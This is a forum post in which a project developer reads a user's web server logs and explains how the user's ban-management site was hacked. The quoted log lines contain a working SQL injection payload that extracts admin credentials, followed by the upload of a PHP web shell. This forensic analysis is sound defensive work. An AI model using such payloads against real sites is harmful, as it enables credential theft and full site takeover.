Current time: 05-08-2024, 12:56 AM Hello There, Guest! (LoginRegister)


Post Reply 
Folder permissions
Author Message
kilburn Offline
Development Team
*****
Dev Team

Posts: 2,182
Joined: Feb 2007
Reputation: 34
Post: #9
RE: Folder permissions
Looks like a classical SQL injection to get the admin user/pass:
Code:
90.157.8.141 - - [04/Feb/2010:13:54:44 +0100] "GET /code.php HTTP/1.1" 200 190 "http://bans.xxxx-xxxxxx.com/ban_details.php?bid=5100+union+select+1,concat(username,0x3a,password,0x3a,logco​de),3,4,5,6+from+amx_webadmins" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"

Followed by the installation of a php_shell through the admin interface:
Code:
90.157.8.141 - - [04/Feb/2010:13:57:08 +0100] "POST /admin/demo.php HTTP/1.1" 200 149 "http://bans.xxxx-xxxxxx.com/admin/demo.php" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10"
90.157.8.141 - - [04/Feb/2010:13:57:24 +0100] "GET /demos/wso2_pack.php HTTP/1.1" 200 105 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"

... and once he had a php shell uploaded, all sort of nasty things are possible: website completely hacked.
02-05-2010 08:19 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply 


Messages In This Thread
Folder permissions - c0urier - 01-02-2010, 06:12 PM
RE: Folder permissions - kilburn - 01-02-2010, 08:08 PM
RE: Folder permissions - c0urier - 01-02-2010, 08:23 PM
RE: Folder permissions - kilburn - 01-02-2010, 08:29 PM
RE: Folder permissions - c0urier - 01-02-2010, 08:36 PM
RE: Folder permissions - c0urier - 02-05-2010, 08:26 AM
RE: Folder permissions - kilburn - 02-05-2010, 06:59 PM
RE: Folder permissions - c0urier - 02-05-2010, 08:12 PM
RE: Folder permissions - kilburn - 02-05-2010 08:19 PM
RE: Folder permissions - c0urier - 02-06-2010, 09:22 PM
RE: Folder permissions - kilburn - 02-07-2010, 04:17 AM
RE: Folder permissions - RatS - 02-07-2010, 04:49 AM
RE: Folder permissions - c0urier - 02-07-2010, 05:36 AM

Forum Jump:


User(s) browsing this thread: 2 Guest(s)